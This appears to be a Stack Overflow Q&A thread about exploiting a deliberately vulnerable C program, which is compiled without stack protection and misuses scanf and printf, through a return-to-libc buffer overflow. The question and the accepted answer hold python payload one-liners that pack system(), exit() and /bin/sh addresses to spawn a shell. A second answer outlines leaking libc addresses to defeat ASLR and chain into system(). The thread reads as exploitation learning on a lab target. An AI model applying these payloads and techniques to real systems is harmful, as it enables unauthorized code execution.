# Return into libc attack

Tags: c, linux, buffer-overflow, libc

I am trying to implement return-to-libc attack on the below code using format string attack vector.

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
   char a[10];
   scanf("%s",&a);  
   printf(a);
   return 0;
}
```

I have figured out the address of the system() using `p system` command in `gdb`. And by inspection of the stack frame using `x/500s $esp`, I figured the environment variable's address which contains `\bin\sh`.

```
system: 0xf7e2cda0 
exit: 0xf7e209d0
\bin\bash: 0xffffd207
```

With these things in place, I constructed the below format string:

```
python -c 'print "A"*14 + "\xbc\xcd\xff\xff" + "\xa0\xcd\xe2\xf7" + "\xd0\x09\xe2\xf7" + "\x07\xd2\xff\xff"' > inp
```

where `0xffffcdbc - 0x4` is the local address which contains system address `0xf7e2cda0` value.

I compiled the program using `gcc -m32 -fno-stack-protector -o sh sh.c` and ran it using `gdb sh`. Upon execution, on entering `r<inp`, I get the below output

[image: gdb_output]

As seen above, there's some error command which is shown and I get to the shell only after running `r` command again. Could someone explain what am I missing here so that I get to the shell directly?

Also, when I tried to execute the program above without gdb ( by `./sh < inp`) by offsetting the gdb address, I get a segmentation fault error. I am assuming this can be solved once the above fix gets corrected.

Kindly answer by giving a complete working exploit - most of the tutorials online use `argv[1]` in explaining the similar problem but I wish to get the exploit working without the use of arguments.

Thanks!

Comment: If not for a solution to the problem above, any working exploit string for the above program is also helpful!

Comment: to the person who downvoted my question without a comment or reply - please know that I have spent some quality hours before posting a question, I have crafted it well to make sure that everything looks readable. Please don't randomly downvote a question!

Comment: are you expecting `/bin/bash` or `/bin/dash` ?

Comment: I have the environment variable location pointing to `/bin/bash`, but from my understanding in `gdb ` that gets interpreted as `/bin/dash`. Either way, it would be great if I can have a working exploit for the above code

Comment: okay, did you observe [This](https://stackoverflow.com/questions/19124095/return-to-lib-c-buffer-overflow-exercise-issue) ?

Comment: Yes, I just was looking into it. The problem still persists on using a `/bin/sh` string from the libc library space

Answer (score 1, accepted):

Finally after some days of research, I have figured out the problem. It wasn't that the address of the `/bin/sh` string was wrong or that you only need a `\bin\sh` string address location from `libc` library to get this to working, but all that you need is a nop sled of 4 bytes at the end of the address of the string that you have placed. So, in essence, my attack string would like this

```
python -c 'print "A"*14 + "\xbc\xcd\xff\xff" + "\xa0\xcd\xe2\xf7" + "\xd0\x09\xe2\xf7" + "\x07\xd2\xff\xff" + "\x90\x90\x90\x90" ' > inp
```

or in the cases where you are writing a `/bin/sh` directly into your buffer, something like the below string would work

```
python -c ' print "A"*14 + "\xbc\xcd\xff\xff" + "\xa0\xcd\xe2\xf7" + "\xd0\x09\xe2\xf7" + "\x84\xce\xff\xff" + "\x5c\x73\x68\0" + "\x90\x90\x90\x90" ' > inp
```

where `\x5c\x73\x68` (hex for `\bin\sh`) is stored in the buffer at `\x84\xce\xff\xff`

**Note:** I sometimes also observed that the addresses that you write at a specific location don't somehow show up. It is in these cases that you should do padding to ensure that everything gets stored at their respective locations.

Comment: Interesting, in your first solution may you set a break point at `system` to see what's its parameter?

Answer (score 3):

First, you're constructing a pure stack-base overflow, not format string payload.

**The libc function `system()` would work with gdb even if its parameter is not valid**. For example, the call `system("asdasd")` still gives you a shell in gdb (with error messag  e pop out, that's what you've seen), so your payload basically didn't locate the `/bin/sh` correctly.

You should put a padding between the address of `system` and the address of `/bin/sh` (a lot of pwn beginners forget this), e.g.

```
print 'A'*padding_to_ret + addr_system + padding + addr_binsh
```

> For x86 calling convention, Once a function is called, the arguments
>   are push, next the return address, so when ROP-chain take `system` as
>   return, **`$esp` is now pointing to the position at `padding`, so the
>   parameter `/bin/sh` (`$ebp+0x4`) should be right next to `padding`.**

---

For the last you mention you want to construct a payload without `argv` helping, yes it's possible, but you need to have a chance to **leak libc address to defeat ASLR** to get the address of `/bin/sh` (you can find this string in libc).

Take the code you provided as example :

1. `scanf("%s, &a)`

   - Construct something like `%x%x` or `%9$x` for next `printf` to leak some libc address on the stack.
   - Overwrite return address by `main` to do another reading.
2. `printf(a)`

   - Receive leak address, calculate libc base address and other useful function like `system_addr = libc_addr + system_offset`.
3. `scanf("%s, &a)`

   - Now you know the address of `system` and `/bin/sh`, construct the ROP chain above to gain control.

Comment: I did have the padding (`\xd0\x09\xe2\xf7` -> exit address) inserted in between addr_system and the address of `/bin/sh`. I am assuming the padding length that you mentioned is of 4 bytes which is what I have already.